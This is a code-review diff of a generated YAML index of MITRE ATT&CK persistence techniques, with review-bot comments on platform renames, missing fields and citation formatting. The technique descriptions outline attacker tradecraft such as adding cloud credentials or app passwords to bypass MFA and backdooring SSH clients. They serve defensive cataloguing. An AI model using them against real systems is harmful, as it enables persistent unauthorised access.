- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
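Review bot: the platform change from `Office 365` to `Office Suite` (with the version bump from 1.1 to 1.2) alters a value that other artifacts filter on: any per-platform index or query keyed on the literal string `Office 365` will silently stop matching T1137.001. Check that the platform-specific index files are regenerated from the same source data in this change, otherwise they will disagree with this file about which techniques apply to Office.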
@@ -31606,11 +31973,47 @@ persistence:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+ created: '2019-11-07T20:29:17.788Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/001
+ external_id: T1137.001
+ - source_name: MSDN VBA in Office
+ description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+ Retrieved July 3, 2017.
+ url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+ - source_name: Hexacorn Office Template Macros
+ description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+ Retrieved July 3, 2017.
+ url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+ - source_name: Microsoft Change Normal Template
+ description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+ Retrieved July 3, 2017.
+ url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+ - source_name: enigma0x3 normal.dotm
+ description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+ Retrieved July 3, 2017.
+ url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+ - source_name: CrowdStrike Outlook Forms
+ description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+ Movement and Persistence. Retrieved February 5, 2019.
+ url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.001
atomic_tests: []
T1546.009:
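Review bot: `x_mitre_permissions_required` (`User`, `Administrator`) is removed from T1137.001 with no replacement, while `revoked: false` and the reordered `external_references` are added. The permissions field is still present on other objects in this diff (T1546.012, T1547.015 and T1205.001 keep theirs), so a consumer that expects it on every technique will now hit a missing key; if the upstream data dropped the field for this object, that should be stated in the commit message and index consumers should handle its absence.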
@@ -31642,7 +32045,7 @@ persistence:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31690,13 +32093,11 @@ persistence:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31709,16 +32110,16 @@ persistence:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -31730,16 +32131,16 @@ persistence:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
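Review bot: `x_mitre_platforms` for T1098.005 loses `SaaS` as well as `Azure AD`, and only `Identity Provider` comes back, so this is a narrowing of scope and not just the rename to the new platform taxonomy; the description in the hunk above still frames the technique around generic MFA self-enrollment and device management, not only Entra ID. Confirm the dropped `SaaS` entry matches the upstream ATT&CK object rather than being a generator artifact, since the version bump to 1.3 and the added contributor indicate the object was otherwise refreshed deliberately.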
@@ -31794,7 +32195,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542:
technique:
@@ -31855,7 +32255,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.015:
technique:
@@ -31931,7 +32330,7 @@ persistence:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -31959,8 +32358,6 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1205.001:
@@ -31986,7 +32383,7 @@ persistence:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -32011,23 +32408,21 @@ persistence:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
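Review bot: the rewritten description now reads `in Azure / Entra ID` at the top of T1098.001 while the same object says plain `Entra ID` a few lines later (`For example, in Entra ID environments`) and T1098.005 above was changed to `Entra ID` throughout. The mixed naming comes from the upstream text, so nothing should be hand-edited in a generated index, but it is worth reporting upstream. The re-wrapping of the surrounding lines (same words, different line breaks) is serialization noise that inflates the hunk for no content change.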
@@ -32037,11 +32432,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
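Review bot: the new CreateLoginProfile sentence introduces two citation keys, `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`; both are added to `external_references` further down in this object, so the citations resolve and no dangling `(Citation: ...)` is left behind. The link target `[Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538)` follows the same URL form as the other technique links in the file.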
@@ -32052,12 +32451,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -32066,6 +32472,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
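Review bot: `x_mitre_detection` is unchanged here even though the description of this same object now adds two vectors, a console password created via CreateLoginProfile and Entra ID app passwords that bypass MFA and can outlive a primary password reset; the detection text still only covers Service Principal and Application modifications in Azure Activity Logs and the SSH key create/import APIs. The gap is in the upstream ATT&CK text rather than in this regeneration, but anyone using this field to gauge detection coverage should note that login-profile creation and app-password registration events are not called out.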
@@ -32074,13 +32481,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -32106,10 +32516,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
@@ -32118,10 +32536,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32138,14 +32566,11 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32220,7 +32645,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32309,24 +32733,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
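Review bot: the added paragraph about pinning a modified binary with `yum-versionlock` / `versionlock.list` is a useful defender hint that the `x_mitre_detection` text following it (signing certificate metadata and signature validity) does not pick up: an unexpected versionlock entry for a package such as an SSH client is an observable in its own right and worth noting alongside the signature checks. The new `+` blank line inside the `|-` block scalar is valid YAML and yields the intended paragraph break, and the new `(Citation: Google Cloud Mandiant UNC3886 2024)` key is defined in the `external_references` hunk below.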
@@ -32340,7 +32767,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32355,6 +32782,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
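Review bot: the description string for the new `Google Cloud Mandiant UNC3886 2024` reference begins with a stray leading space (`" Punsaen Boonyakarn, ...`), unlike every other entry in the list; it is harmless to YAML but will appear verbatim in anything that renders the citation. Since the index is generated, the fix belongs in the upstream reference data, or in trimming descriptions when the generator emits them.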
@@ -32368,11 +32800,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -32398,7 +32829,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -32412,7 +32842,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -32439,8 +32868,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -32451,7 +32880,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -32492,7 +32922,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32512,12 +32942,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32571,11 +33000,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32662,9 +33090,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32677,12 +33105,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32695,9 +33122,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32706,13 +33135,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
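Review bot: the platform list for T1136.003 drops 'Azure AD', 'Office 365' and 'Google Workspace' in favour of 'Office Suite' and 'Identity Provider' (x_mitre_version 1.5 to 1.6). Any per-platform index, filter or test selection keyed on the old platform names will silently stop matching this technique, so the index generator and any index files named after the old platforms should be checked in this same change rather than left to drift. The same rename is applied to T1098, T1078 and T1556.006 below, so a single documented mapping from old to new platform names would make the intent clear.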
@@ -32760,14 +33189,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
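Review bot: two of the three lines removed here, x_mitre_attack_spec_version: 3.2.0 and x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5, are not really deletions: the identical keys and values are re-added to T1136.003 in the two hunks above, only at a different position in the mapping. The generated YAML evidently has no stable key order, which turns an object with a single real change into a multi-hunk diff and hides the changes that do matter (here, the spec_version removal). Consider emitting keys in a fixed or sorted order in the generator so a regeneration only produces a diff where the data changed.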
@@ -32803,16 +33229,15 @@ persistence:
